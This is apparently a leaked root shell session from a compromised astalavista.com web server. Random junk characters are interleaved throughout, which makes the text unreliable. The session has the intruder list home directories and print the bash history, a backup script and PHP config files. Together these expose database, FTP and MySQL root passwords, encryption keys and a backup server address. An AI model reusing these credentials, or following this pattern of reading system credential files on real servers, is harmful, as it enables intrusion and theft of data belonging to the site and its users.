sh-3.2# cat /etc/motd# S1 R9 H8 c5 R- C: U d8 I- A) {
#####################################################3 W( r4 X+ G& N% p
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #! X8 q- U% V1 P& K3 ?* ]
# |__| [__ | |__| | |__| | | | [__ | |__| #$ Q m8 p# a$ {. P: s' Z3 c
# | | ___] | | | |___ | | \/ | ___] | | | #
, Z9 k9 W0 D! w: i3 Y3 `# #/ w& E$ a5 [7 I* ]& Q
#####################################################$ {" O* s+ I; z6 |- _' c/ I
# #% `- c3 o) w0 j& ^8 H- p
# Admin Contact - 链接标记support@secureservertech.com #$ ~) q% R( Q. \$ Q
# #9 t! O- A; }5 }9 w2 M2 j
# Available ShortCuts #& e. e8 Q+ w9 a- x5 U
# #
3 d* }& Y b' g; g! o# nst - list active connections #5 m$ h6 l! L0 g$ M
# ddos - shows how many times each ip is connected #
6 U! J# n+ |5 G* u! _- Q# ltr - restart the webserver #
E) |) T9 y% B6 V3 V# P x# phpc - edit the php config file #
5 m" }* X3 Q5 n* {; Y9 @5 L4 l I- I# htc - edit the webserver configuration file #
- m l! L# @. v4 B9 V5 o7 Z6 D( \: d# up - uptime ## W9 S; e% t2 J- ]4 f, s3 C
# etd - edit the motd of the day file #4 r! X0 h; g3 l0 A: T. a4 b1 n. m
# htr - start and restart apache if needed #, p7 [4 d; T4 T6 } \% s
# syng - shows active SYN_RECV connections ## _1 u) S5 w; d* u& ]: d" s: v
# synd - syn flood blocker - “synd -h” for usage #
. @; Y5 z. m3 Y1 K- L* m6 J9 K#####################################################
* i+ L! L* c9 J2 l$ C3 |# NOTES: #/ ]( U" I$ r: I! f( I& V" w
# Last Upgrade - 12-08-2008 by JF #
$ }# s+ z# c0 b) u9 F# My.cnf/Mysql Optimization - 1-28-09 #
4 M; p6 w+ m$ M' D0 ~# #& Y# i s2 m2 S
# #1 G7 c$ B/ g3 W; @1 n# C
# #' i% H. a ]* x. y! o+ x
#####################################################; T0 L" C9 a( G" E: m) T: a9 b
( N& V. e1 s* ^$ X6 o5 Y$ {sh-3.2# lastlog | grep -v Never
8 n2 R8 P" ]7 Y2 A9 @0 i. fUsername Port From Latest, I9 e7 U$ O q8 p/ o
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
( ^: o. T$ |; yadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008- t7 w4 @/ c2 `3 V e
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009! N7 ~ d- M6 E, Y
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
; v( s; @) |& j0 P. Q- _! Y) s$ H0 m/ t+ R; X
sh-3.2# ls -la
2 Z! U* F3 { I/ t. w" _! Mtotal 4533768 U# G* w% z" J4 ]6 } r4 L
drwxr-x— 15 root root 4096 Jun 4 08:40 .
; R$ j" a7 g1 E' \ T7 x' Adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! h. ~+ I% X* X' P: J W; U
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
! L9 t4 ~# t% k9 }4 J* ~-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg3 Q- V/ R6 N% }) U. [
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
4 O2 h7 W$ ^5 `+ v, X3 J-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
; _ q" I! a4 f/ g4 q-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
, q7 c# w/ E1 N; `5 N8 m ~$ F-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc6 u: E; p" k9 }1 N& N# }
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh5 |3 Y, L) F2 h! R1 {
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
5 N5 m- t3 v. P5 l0 Z7 J! p-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql7 Y9 c' h9 P/ ?! s) x! W
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
( |' D' u3 g2 t$ D6 j! @$ O-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc/ [1 e- _+ H V) R, c
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
/ E% I& d4 }" M% G; K" Ydrwx—— 2 root root 4096 Oct 28 2007 .elinks( v- M0 i. O8 r0 r4 t9 _
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1# C& Y0 E0 X# d. k4 `; D& J
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
" s+ _9 M* `( {1 K-rw——- 1 root root 0 Apr 16 13:19 .history! Z: v( u. O6 o. X! j" E V
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log/ E, O" V4 A6 Q) ^8 T
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog. I# T# b$ z- b4 f! e: X
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
! t- n- y: e; ^, f0 z. L0 z-rw——- 1 root root 35 Jun 2 14:23 .lesshst1 a5 L8 T/ `: N9 s7 _
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
% Y$ s, x4 h+ M C# J0 C' m, cdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec' H% a( C3 \2 \. [
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz) ]& f( l$ I3 k# o( @/ }
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
& P8 L4 n% c) Y, i0 U O-rwx—— 1 root root 760 Sep 18 2008 lp0 {$ k6 ?0 O: C/ m* w) E5 I7 c
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1, h j$ c1 }% b1 I7 _; u
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz8 {0 \0 z6 J% k; M5 V* y& ^5 C
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.19 R ]- o% O! Z7 \
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.95 Q/ A! @1 Z! n, T
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
5 h9 T9 t8 j( T; d* F5 Pdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.39 c5 `- M1 `" M
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz; N; A5 u1 H3 E9 O* r$ K
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh$ U* B) I0 S6 m/ N
-rw——- 1 root root 41 Oct 19 2007 .my.cnf& a! K# U* g' ~5 |: c
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history% Y } _9 ?- }* z2 a) ~4 R
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
1 Z, l1 K5 O! K-rw——- 1 root root 41 May 20 2008 .mytop0 c2 D! S( B. r9 [3 Q1 {! @, _$ h& {
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
5 S* M9 b2 q0 W# N# d5 r-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz; k3 i1 Y3 L4 S/ O1 J9 [
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 d' @ o1 s& M# j-rw——- 1 root root 1462 Sep 21 2007 opt.php
1 a5 b7 [, U- Z. A7 p% @-rw-r–r– 1 root root 3371 Sep 22 2007 p2 f$ N. e2 P* |. M, y
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
" M2 ?' l) Q: j* U& A- ?5 _4 X-rw——- 1 root root 1024 Feb 3 21:32 .rnd
]3 n+ N/ h7 g- Z-rw-r–r– 1 root root 716 Nov 28 2007 server.csr6 w, R$ m* f" L0 m- S L
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
" v; }- A4 H! q# Edrwx—— 2 root root 4096 Oct 10 2008 .ssh) k& {6 Z! J0 t( I
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
9 ] Q2 V- c- W8 Q8 T-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc, a" {' E4 ^$ A7 Z( _" I! O
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip5 p' A3 c/ c* R+ `# F( r q( A
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
! C0 E" p, J a! Zdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
- H" p' ^& c. w* |& t-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
% q2 f, Z$ N+ g2 u. hdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
: y3 o- G8 s. H$ d4 ?-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
8 b0 N/ `8 J9 z% g' `: f-rw——- 1 root root 12997 May 16 2008 .viminfo9 L9 G) J! F3 q
$ o6 ]' ^4 U( e6 m! {' {: u: Hsh-3.2# cat .bash_history
U/ ?. x4 Z& `9 }5 f[snip]1 w% l. T- g2 V; W6 k- ?4 F8 d5 _
wget cp4sst.com/sstlinux.tar.gz: Y( g! G) Y* s+ w
tar zxvf sstlinux.tar.gz
2 ]* I' o: R7 j: e( Fcd linux-2.6.27.100 S6 c- |4 q) h6 m6 y1 J
sh install.sh# l! j3 o! y# x, M
make bzImage ; make modules ; make modules_install ; make install
! }. m% p W0 `- n( Amake clean
" y" G, W# _, l l1 S% a0 Nservice mysqld restart
: O% H2 E/ Y4 P8 i# U2 H7 x7 B[snip]6 E9 j8 x2 c4 g+ h+ O9 j* T
cd /usr/sbin/
9 d r- d# j5 J; B) a+ Fchmod 4777 traceroute
# `* w- t9 J- g+ H3 j6 |% kchmod 4777 ping7 J6 ?; q" ~; g0 o: t$ U
traceroute -I 链接标记[url]www.astalavista.ch[/url]
: U8 e* O) _( I9 i[snip]
7 X7 J6 [. }: c8 S( Pvi /etc/csf/csf.conf/ d- i5 l: v' `! L
traceroute google.ch& v) N" ~# A: X
service csf restart3 j2 \4 @! j0 [/ F. ]; t6 ]8 P
tracert google.ch# R; G5 u) R0 {$ x9 h
service csf restart; M/ u" A: Z- t0 A
traceroute 链接标记[url]www.google.ch[/url]
+ c; {1 |+ g; }tracert 链接标记[url]www.google.ch[/url]+ B2 Z2 P; O. u5 `2 N: k& \9 W; B
traceroute 链接标记[url]www.google.ch[/url], n+ f6 l4 U) W$ c
locate traceroute' b; v% X8 [( d1 F7 V6 r' z' g
chown 4755 /bin/traceroute/ n8 v- y' a$ ]2 C) _5 @# ^
chown 4777 /bin/traceroute
8 i; q9 e8 N+ v+ Y9 ulocate ping d8 o+ ]7 H, ^2 ^& v
chown 4755 /bin/ping
, A: b9 E# D( F2 v: T: ^chown 4777 /bin/ping8 S/ O5 K$ s) A, ^4 }1 e
cd /bin/
8 e t; `, P% k W3 Vls -ali | grep ping: C+ X, C( X* N9 [3 A w6 g: ]
chown root ping* R e9 ^# G- [
chmod 4755 ping5 m4 Z8 h; {* i7 ?
ls -ali | grep traceroute2 U1 ?( J! y4 a
chown root traceroute% a v1 I2 F( v) ~
chmod 4755 traceroute5 Y. m1 v# C. o- f
ls -ali | grep traceroute
' R/ f' K% t+ d: F" ?traceroute -I 链接标记[url]www.google.ch[/url]; c+ T: R) Q0 b3 T8 C
traceroute 链接标记[url]www.google.ch[/url]' m! q" ]4 Q+ J. N
whois pmsantos.ch
B' M# v8 l- U6 g! X[snip]
" d: h* @7 {: T# z: e" D8 |mysql -h com_contrexx2_live < /root/defaultp_ports.sql
/ B% Y2 n; _0 c+ J1 ]- s1 u* qmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql; }( J% g; ]* {* ^
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
' S3 k1 F1 j; }3 i+ f# \mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql; M! }+ F% m/ K3 G
top
& \1 P5 S1 _9 c$ nping ssth.ch9 d9 ~% ~6 E+ X5 H
ping asdlkfaljgasd???ljg???lasj.ch
+ D) m4 ~- N4 k0 Mping asdlkfaljgasdlasj.ch
; M# \' w# z! q" O9 J) H( L0 `( L- Aping 链接标记[url]www.ssth.ch[/url]
3 e' _' T, ]: U5 G9 k: Gping ssth.ch* q# b/ u; B0 B4 E: t) E4 Y( W
nslookup 链接标记[url]www.google.ch[/url]
* o& n; Q, O. ?. snslookup 链接标记[url]www.ssth.ch[/url], |7 P Y# m0 `
man nslookup
5 c V. \; u1 c1 Jping 链接标记[url]www.google.ch[/url]
0 O) `# A9 n! ?, Fnslookup 链接标记[url]www.google.ch[/url]! B0 d1 B- s! O' d6 B- D
nslookup 链接标记[url]www.google.ch[/url]
6 m) T0 v1 M) u, tnslookup salfjasdlf.ch
- T6 o7 x: f! S# n, W1 G; M* A[snip]* f+ ^$ `1 Z0 }8 r; G7 T
openssl passwd -1 sadf
% X ]5 {5 l* c* \9 }, ^openssl passwd -1 5cZNHstdTy
2 ^# V4 B6 R# A8 ?" Zmysql
5 e3 }( F% ~. e) ?4 `mysql
! |; h6 a) N. t- I% }- O: h% C3 }7 Ilocate proftp
* a, R3 n& F! U5 b1 fvi /etc/proftpd.passwd
. v5 Q- f; w9 B4 f. tservice proftpd restart: U' Q) S4 q8 U& x3 X s. v
locate proftpd.conf `4 S: g( ]. Z4 F! T2 K0 t9 {& k
vi /etc/proftpd.conf( I+ `: B# k9 q. N7 T
vi /etc/proftpd.passwd" p( X0 \: k: D5 F
service proftpd restart% a" T* f. j! i3 f' `9 o
[snip]
8 c; N* a# i5 D; P0 J6 _! N+ m/bin/sh /home/com/backup_system/backup.sh
, X% W) w" D Y3 ]4 S9 etar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
2 u: B' I7 \) Z6 Y" {) K) tmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
& W) G9 u/ W3 Qmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
; V! j9 Q3 ]5 Y1 V! ?ls -ali
2 w0 F/ }0 K) m3 D3 X' rmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql4 K& j$ C3 d/ z& e3 w0 U
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
2 | h K: J, y: t1 Scrontab -l0 Z9 F g3 l" v7 R2 S
crontab -l% ~. }4 {/ M4 r5 }2 `) \$ D1 e' i
php -q /home/com/public_html/modifications/cronjobs/securitynews.php/ L) ^3 J- }% ?
/home/com/public_html/modifications/cronjobs/exploits.sh
5 c8 T( Z/ Z0 p5 `. r- X' zwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
* h) ]/ I8 M" A- m" D, etar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz; Q' T, f, {8 |! p7 r* G( W, F
cd lsws-4.0.35 A2 p+ _9 n- a! L; s
sh install.sh
+ B) G8 f, Q2 auptime }" b& l: {; _
hdparm -tt /dev/sda
$ W) X1 D9 B3 T) V' P! viostat
) \! Z. D! }: r' V/ _yum install iostat
; o5 M( Y, b* C7 h6 biostat
! @! @ i* l( I- F/ e/ ~" Mwhereis iostat8 r7 {" \( R1 ?
yjm clean all
E1 d8 h4 H& N% `& Iyum clean all ; yum -y update
% s+ e% Z; W0 E/ M8 d9 Q8 j7 Tiostat
; s3 M8 R* [; t& a# Hyum install systat& x; |# I+ ?1 |/ I+ y0 G
rpm -qa | grep iostat0 |% t9 [, l9 v6 H" P) \
rpm -qa | grep sysstat
) n, m7 u; o3 p- M' ]( qrpm -qa | grep systat
) V! P$ a9 B1 admesg -c$ d2 e/ v: g; `/ l; a8 Q
sysctl -p9 M, b3 I' f( t ]
uname -r
( P% i5 }9 M7 c) R9 Y5 q9 ncd /usr/src
! u& {2 w8 R- y, p0 nwget nix101.com/kernels/sstlinux.tar.gz
" X! ^) `2 g* `+ N- Vshutdown -r now2 A% C, o+ D& u, _2 A4 j, s
nano -w /boot/grub/grub.conf3 S" I9 z/ O5 H% _* g
* H, {! R, f0 Q9 k" g7 S& t/ V
sh-3.2# cat .my.cnf
/ {$ }- D/ n- l. U: R( U. `[client]# M$ o7 x: _0 ]- B8 _0 t
user=da_admin7 y2 Q" B; Y6 y3 t& P" o g
password=X9dctmRH' n& i' M( N# }( N7 {: {
- x$ L$ e4 U3 Z/ H
sh-3.2# cat /home/com/backup_system/backup.sh
* y4 B7 J \. F- t' }#!/bin/sh. y! i. e8 n' `0 u& {
#####################################################################6 B% u7 c8 A* `! q
# ## x5 b& |3 S! X3 G
# incremental backup for astalavista.com #; M1 w, K+ l. y( e. y) K A* K
# #
# Q- m8 ^0 F! w, N# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
, `% J. C2 x& L. ~" _5 d* y" }7 k5 Z1 P, [/ h# #
# t; F/ K/ q$ e& N. a. m$ u###################################################################### y" B1 \, ~) ]9 n# o2 ^7 ]8 L S$ p
[snip]7 Q0 r, z+ w/ f2 q
PROG_DIR=”/home/com/backup_system”;
9 e) `3 Y5 L! P: q7 b* n1 w p+ {BACKUP_DIR=”/home/com/backups”;
2 L& ]4 R( J% ?' K; n$ E$ QDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;0 X6 L% [$ }& x
# ftp for synology backup server. k8 _. @0 F$ p/ q, H( J9 C1 L
FTP_HOST=”212.254.194.163″;
# Q6 o9 s1 n+ `+ O' ?0 U, CFTP_PORT=”21″;
, G3 i# q3 k, I; t4 j; b0 k% X* vFTP_USER=”astalavista.com”;
+ a$ H. p# _) cFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;/ {* g5 W3 w9 I# o! e
FTP_DIR=”/astalavista.com”;' H/ J8 _) y1 _3 }
# database, T) o& n) P6 W3 y* G8 V# v+ s& X
DB_HOST=”localhost”;
6 O6 f, X5 v, r+ H- b: y |DB_USER=”contrexxuser2″;
" e! i& {. b7 Y; B( Q" F- ~DB_PASS=”0fEYNZgXz1pKe”;
2 S, @# e2 g) C lDB_DATABASE1=”com_contrexx2_live”;
6 q# y7 M9 M- J9 eDB_DATABASE2=”com_contrexx2″;! _# j& E6 h' K0 N( B) _# d
[snip]
z4 U( G8 _! j6 E/ J! Z+ p$ aftp -in $FTP_HOST $FTP_PORT <<EOF
3 @7 K( i8 u2 q% [5 S" c) ]quote USER $FTP_USER
# W1 t$ u& A8 f9 N: [9 Q6 rquote PASS $FTP_PASS! v) w1 \9 \0 D4 Z7 T% a" G* b& A
cd $FTP_DIR+ g+ O6 l! L# C r: c
put $DB_FULLNAME-SQL_Dump.tar
) `0 R+ m& U, c$ s. _put $BACKUP_FULLNAME-Public_HTML.tar
% {8 s( I5 U" v5 W' cclose
/ M' H% I. N' `: Qbye
, q- `) M- ^2 y4 J4 xEOF
& v3 h( R9 y/ @8 F3 M' V. l; Y3 o: t- p' |8 l. t
sh-3.2# cd /home/ \8 Y q8 r R0 u: A
sh-3.2# ls -la+ ?" h; @( m' _' e( d: E2 |* u- Y
total 120" }; {$ g7 R5 J; O! Z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
, A0 f3 D: ?0 Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .., n5 i. N/ v; z+ S8 H1 y7 h
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin, L# X! a& }* L, ^, `) k- a
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( [& R1 M/ z- [7 e# O" \. O( k
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user: O# J, X g% a! }' D
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet! s8 l' y7 u2 d! U' c
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup8 K8 O- w1 V9 |( k2 ]% ?% A
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161# e: `* U( Q, X2 k# [
drwx–x–x 10 com com 4096 Apr 28 12:40 com& s/ M3 A1 K, H! }4 R7 U" D2 f# k
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
( n/ C0 F! [1 g% i6 `drwx—— 3 jon jon 4096 Sep 21 2007 jon
& u b' y0 K5 p# }6 Rdrwx—— 2 root root 16384 Sep 11 2007 lost+found
+ V& r# w6 [/ U5 X2 P8 k" A( Ndrwxr-xr-x 2 root root 4096 Sep 14 2007 my/ \2 U% h) h4 D
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 r- w; g" b3 w3 t- N, sdrwx—— 2 jon jon 4096 Sep 15 2007 test, j7 ^4 [4 [* z0 ]2 @8 c
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp# ~- a/ }& s$ h: b
$ Y# s7 X5 G0 _$ Csh-3.2# cd admin" A; k8 b3 a) ?: q6 L
sh-3.2# ls -la. A/ ]1 g7 ?8 w* |- n4 ?2 a
total 1735896
, t* q1 W. S' C& u9 U. ~8 @drwx–x–x 9 admin admin 4096 Nov 28 2007 .
! d) y% h$ B& ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' e0 i, A# C# c$ y/ s7 K. v1 mdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups0 a# C) Y% A( Z, O) n
drwx—— 2 admin admin 4096 Sep 28 2007 backups
5 C' w" J2 Z; c" s" U; Q-rw——- 1 admin admin 860 Sep 17 2008 .bash_history+ K5 y7 k% m; R$ C
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout& C# s! e: r5 i: Y; W8 S
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile, U) R( S' b, p
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
( z: J0 [& {: ^! q/ o- b, |$ D- f: Pdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups5 d8 r. y; x1 x% l
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains4 _, E/ I2 E* H( B* O
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap2 S1 Q8 k7 E" o. U
-rw-r–r– 1 root root 24 Sep 21 2007 info.php" W, ]0 g. q1 U2 J2 K" `2 I& w: X* r
drwx—— 2 admin admin 4096 Sep 21 2007 mail, O- P; @2 v: M
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
" F9 L" j: A2 ^! `- R! G" `: q E-rw-r–r– 1 root root 887 Nov 28 2007 server.key" J; U r" G$ u0 _
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow v; y. I7 K4 X
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
" ?+ F3 {: R2 o4 |drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups) O ^. }, u6 V9 x2 X6 q% D" t# r/ I
1 M" J* v* ?: f/ U0 ysh-3.2# ..
6 H2 A! w! g1 [3 H! S+ u! [6 Msh-3.2# cd jon9 ?: s1 J5 M, J. m4 R
sh-3.2# ls -la
& i- }6 A- _+ |, ptotal 36
/ p2 v( J- }4 odrwx—— 3 jon jon 4096 Sep 21 2007 .
+ c4 S- g D3 b0 Y+ j1 ]# [drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* |- i% x$ M" g* K( b. ^% j
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history- i, r5 ?) j* Q/ x7 Z) ?
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout! y7 J" u6 y( X- c/ y- f# f
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
7 L! @# l4 f" Z2 r) @5 v-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
8 ^# `* d7 K5 I-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 [9 D8 j) E" \; u9 w
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html) O7 |9 I+ V* Y: j/ B! {/ @: m6 [
}# O" [& ^5 r7 B/ A2 ksh-3.2# cd ..
5 Y/ ~7 R Q6 q6 ysh-3.2# cd test9 o2 O% z9 J* B, i( G1 w
sh-3.2# ls -la
+ M- e- i1 F! N* E# N; ltotal 48
; e8 k* E1 X* U8 zdrwx—— 2 jon jon 4096 Sep 15 2007 .
. m2 ?/ ~- b0 Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 ? f4 P; Y0 `2 \% y1 w-rw——- 1 jon jon 79 Sep 21 2007 .bash_history7 g9 Z# R* M& K2 X( R* `
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
1 F Z% s# a8 M0 m, u, [4 Z+ U. G-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
. z1 b' G, r+ ~( E-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc4 X: p# E- S6 C! @* T: U
sh-3.2# cat .bash_history
# P2 t! N# b4 D( e$ i0 ]6 g/usr/bin/mysqladmin -u root password PoliuJhytg67
+ Q: G& z9 b" N( M) Q( A
/ c5 L0 h" `8 V; Fsh-3.2# cd ..
- m" X8 y- _1 n5 ~0 m+ C5 H esh-3.2# cd astanet p3 ^8 h5 \( G- x% [
sh-3.2# ls -la
. f4 t6 B/ h8 q% _4 U4 X- L3 ptotal 52
8 b) _% w6 @7 Sdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
3 Z' m+ k. B# g4 |8 _+ ^% ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... K! D& C$ Q, v# }5 Q
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* ]' ]5 ]- H; N) F-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history" k4 X. J" G# B* m& W* S
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
9 I" L5 q& X& t( {& {9 D& O$ R-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
, a( Z$ c" }) ~( @9 E/ W-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
; [, }! L5 `& E2 e+ x1 h* B/ ndrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
) ?2 o0 F) }4 p- [) t5 X2 p) O* adrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap; Y# |) @1 D1 L8 L: Z) y
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail+ M4 c( `/ T, w7 Y' f5 M
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
* {( u- c- [0 }* c7 K3 o8 y' elrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html: g; B; G+ G. j" C, ]
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
# ^. f! b/ H, B" ]+ d& z5 }- Q# S
sh-3.2# cd auth/
* j" z, O2 S! E* C7 ~- Xsh-3.2# ls -la! y1 E# x* T T+ r6 g9 E5 ~' l
total 28% [" @ Q2 b( ]( z
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .6 O% n! U% P( B; { E" ?. \ y
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..4 {) @9 t4 V2 E' k1 v) d* U
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php8 t. P' r. h3 e, J
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
& M6 v' c7 Q) E5 E8 y: e. ?-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd" u, e1 T$ D/ D( ?6 e4 I; u$ u
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
5 e- I; i s5 Q-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd4 x2 _, S# [0 Z* P# q. }1 M5 g
6 X& k8 B# n- J- e+ ~5 i$ Ush-3.2# cat hackercontest.config.inc.php# K7 c: k4 _+ w% h7 u8 n' b5 q
<?PHP
$ h1 N' j2 h; q! ~+ f3 ~7 {// Variabeln f?r Verbindung zur Datenbank //
* s ~" i" }$ K, y! B$conxHost = ‘localhost’; // MySQL hostname
, V: ]8 f+ e6 p7 D0 M$conxUser = ‘hackercontest’; // MySQL user
7 z8 j% n- L6 R9 P' }( o$conxPassword = ‘K6m@7dUc’; // MySQL password2 u' P+ r1 t& a
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish) K1 A" \% I# F
?>& c' m' ]: [" C7 u+ n6 f
sh-3.2# cat hosting.config.inc.php
# G0 U$ T" Q1 b% ]<?PHP
5 k4 ^! A9 S. x# |. Z+ _& K// Variabeln f?r Verbindung zur Datenbank //
% j' Q m3 ?+ a' Y" ]7 q% c$conxHost = ‘localhost’; // MySQL hostname6 r* {: P9 P9 {# D M/ Y3 p
$conxUser = ‘hostinguser’; // MySQL user( P. ^0 H2 @6 A$ I! z% A. p( R
$conxPassword = ‘cXvB3981′; // MySQL password
! S8 ?) l9 G5 | {6 Z+ U$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 }" a5 O5 \. q& C( c8 i3 q9 ^?>
/ m9 W$ J! n5 |) E
& |) S' x8 k) Zsh-3.2# cd ..
( k6 R! Q9 a4 k' A( n, V+ ~8 n) tsh-3.2# cd com" T! W& I1 v& ]" K( q+ X
sh-3.2# ls -la
# G8 f8 F# [6 e c& X! {& R1 Ytotal 1412087 m: x+ D G# o4 a( b* u; x
drwx–x–x 10 com com 4096 Apr 28 12:40 .5 u L3 V% g8 y) s' [
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
